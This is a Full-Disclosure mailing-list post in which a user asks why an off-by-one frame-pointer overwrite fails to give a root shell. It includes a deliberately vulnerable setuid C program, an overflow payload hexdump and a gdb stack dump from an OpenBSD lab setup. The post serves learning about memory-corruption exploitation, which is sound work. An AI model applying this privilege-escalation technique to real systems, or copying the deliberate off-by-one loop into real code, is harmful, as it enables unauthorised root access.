[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-Disclosure] exploiting off by one



hi fd, 
 
i'm trying to exploit some overflows to see how it works. i can exploit a
"normal" stack overflow without problem, but now i'm 
trying to exploit an off by one overflow and have some questions, first see
what i did: 
  
vulnerable program: 
 
#include <stdio.h> 
#include <unistd.h> 
#include <sys/types.h> 
 
#define BUFSIZE 128 
 
int main(int argc, char **argv) { 
        char buffer[BUFSIZE]; 
        int i, bufsiz; 
        uid_t userid; 
        bufsiz = BUFSIZE; 
 
        userid = geteuid(); 
        setuid(userid); 
        printf("userid: %i \n", userid); 
        printf("buffsize: %i \n", sizeof(buffer)); 
        printf("buffsize: %i \n", bufsiz); 
        for(i=0;i<=sizeof(buffer);i++) { 
                buffer[i] = argv[1][i]; 
        } 
        printf("buffsize: %i \n", strlen(buffer)); 
        printf("buffer: %s\n", buffer); 
 
        return 0; 
} 
 
 
$ ls -l 
-rwsr-xr-x   1 root  wheel     7788 Apr 14 23:43 offbyone 
 
STARTING EGGSHELL: 
 
$ ./eggframeshell 134 68 1100 
        $EGG at:        0xcfbfd634 
        last_byte: 44 
OVERFLOW BUFFER: 
$ echo -n $IJV | hexdump -v 
0000000 d634 cfbf d634 cfbf d634 cfbf d634 cfbf 
0000010 d634 cfbf d634 cfbf d634 cfbf d634 cfbf 
0000020 d634 cfbf d634 cfbf d634 cfbf d634 cfbf 
0000030 d634 cfbf d634 cfbf d634 cfbf d634 cfbf 
0000040 d634 cfbf d634 cfbf d634 cfbf d634 cfbf 
0000050 d634 cfbf d634 cfbf d634 cfbf d634 cfbf 
0000060 d634 cfbf d634 cfbf d634 cfbf d634 cfbf 
0000070 d634 cfbf d634 cfbf d634 4444 4444 4444 
0000080 4444 cfbf 
0000084 
 
$ gdb ./offbyone 
GNU gdb 4.16.1 
Copyright 1996 Free Software Foundation, Inc. 
GDB is free software, covered by the GNU General Public License, and you are

welcome to change it and/or distribute copies of it under certain
conditions. 
Type "show copying" to see the conditions. 
There is absolutely no warranty for GDB.  Type "show warranty" for details. 
This GDB was configured as "i386-unknown-openbsd3.5"... 
(gdb) break 21 
warning: gdb ignores `const' qualifiers. 
Breakpoint 1 at 0x667: file offbyone.c, line 21. 
(gdb) run $IJV 
Starting program: /./offbyone $IJV 
userid: 1000 
buffsize: 128 
buffsize: 128 
 
Breakpoint 1, main (argc=2, argv=0xcfbfd220) at offbyone.c:21 
21              printf("buffsize: %i \n", strlen(buffer)); 
(gdb) info frame 
Stack level 0, frame at 0xcfbfd1c0: 
 eip = 0x667 in main (offbyone.c:21); saved eip 0x4b1 
 called by frame at 0xcfbfd144 
 source language c. 
 Arglist at 0xcfbfd1c0, args: argc=2, argv=0xcfbfd220 
 Locals at 0xcfbfd1c0, Previous frame's sp is 0x0 
 Saved registers: 
  ebx at 0xcfbfd118, ebp at 0xcfbfd1c0, esi at 0xcfbfd11c, eip at 0xcfbfd1c4

(gdb) x/100x $esp 
0xcfbfd118:     0xcfbfd368      0xcfbfd220      0x00000001      0x00000000 
0xcfbfd128:     0x00000000      0xcfbfd17c      0x48f31671      0x000003e8 
0xcfbfd138:     0x00000080      0x00000081      0xcfbfd634      0xcfbfd634 
0xcfbfd148:     0xcfbfd634      0xcfbfd634      0xcfbfd634      0xcfbfd634 
0xcfbfd158:     0xcfbfd634      0xcfbfd634      0xcfbfd634      0xcfbfd634 
0xcfbfd168:     0xcfbfd634      0xcfbfd634      0xcfbfd634      0xcfbfd634 
0xcfbfd178:     0xcfbfd634      0xcfbfd634      0xcfbfd634      0xcfbfd634 
0xcfbfd188:     0xcfbfd634      0xcfbfd634      0xcfbfd634      0xcfbfd634 
0xcfbfd198:     0xcfbfd634      0xcfbfd634      0xcfbfd634      0xcfbfd634 
0xcfbfd1a8:     0xcfbfd634      0xcfbfd634      0xcfbfd634      0xcfbfd634 
0xcfbfd1b8:     0x4444d634      0x44444444      0xcfbfd144      0x000004b1 
0xcfbfd1c8:     0x00000002      0xcfbfd220      0xcfbfd22c      0xcfbfd368 
0xcfbfd1d8:     0xcfbfd1fc      0x00000385      0x0000049f      0x00000000 
0xcfbfd1e8:     0xcfbfd21c      0x00001000      0x48f2e000      0x00000000 
0xcfbfd1f8:     0x00000410      0xcfbfd21c      0x00000427      0x00000002 
0xcfbfd208:     0xcfbfd220      0xcfbfd22c      0x00000000      0xcfbfdff0 
0xcfbfd218:     0x00000000      0x00000002      0xcfbfd368      0xcfbfd374 
0xcfbfd228:     0x00000000      0xcfbfd3f9      0xcfbfd424      0xcfbfd495 
0xcfbfd238:     0xcfbfd4a3      0xcfbfd4b1      0xcfbfd4c9      0xcfbfd4dd 
0xcfbfd248:     0xcfbfd4f4      0xcfbfd519      0xcfbfd536      0xcfbfd5bf 
0xcfbfd258:     0xcfbfd5ca      0xcfbfd5dd      0xcfbfdddd      0x00000000 
0xcfbfd268:     0x00000003      0x00000034      0x00000004      0x00000020 
0xcfbfd278:     0x00000005      0x00000006      0x00000006      0x00001000 
0xcfbfd288:     0x00000007      0x48f2e000      0x00000008      0x00000000 
0xcfbfd298:     0x00000009      0x00000410      0x00000000      0x00000000 
(gdb) 
(gdb) x/x  0xcfbfd634 
0xcfbfd634:     0x90909090 
 
$ ./offbyone $IJV 
userid: 0 
buffsize: 128 
buffsize: 128 
buffsize: 134 
buffer:

4Ö¿Ï4Ö¿Ï4Ö¿Ï4Ö¿Ï4Ö¿Ï4Ö¿Ï4Ö¿Ï4Ö¿Ï4Ö¿Ï4Ö¿Ï4Ö¿Ï4Ö¿Ï4Ö¿Ï4Ö¿Ï4Ö¿Ï4Ö¿Ï4Ö¿Ï4Ö¿Ï4Ö¿Ï4Ö¿Ï4Ö¿Ï4Ö¿Ï4Ö¿Ï4Ö¿Ï4Ö¿Ï4Ö¿Ï4Ö¿Ï4Ö¿Ï4Ö¿Ï4Ö¿Ï4ÖDDDDDDDѿϱ

$ 
 
hope its enough information. just my question is: i manipulated the least
significant byte of the frame pointer, pointing into my 
buffer. there in my buffer is the address of my shellcode as the manipulated
returnaddress. but the program is not segfaulting, if 
the pointer points to $somewhere. it always exits normally, without opening
a root shell to me. 
 
i'm using gcc 2.95 on openbsd 3.5 (with any stack and anti overflow
protection disabled, "normal" overflow works well) 
 
hope anybody can enlighten me.  
 
joe 

-- 
NEU : GMX Internet.FreeDSL
Ab sofort DSL-Tarif ohne Grundgebühr: http://www.gmx.net/info

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html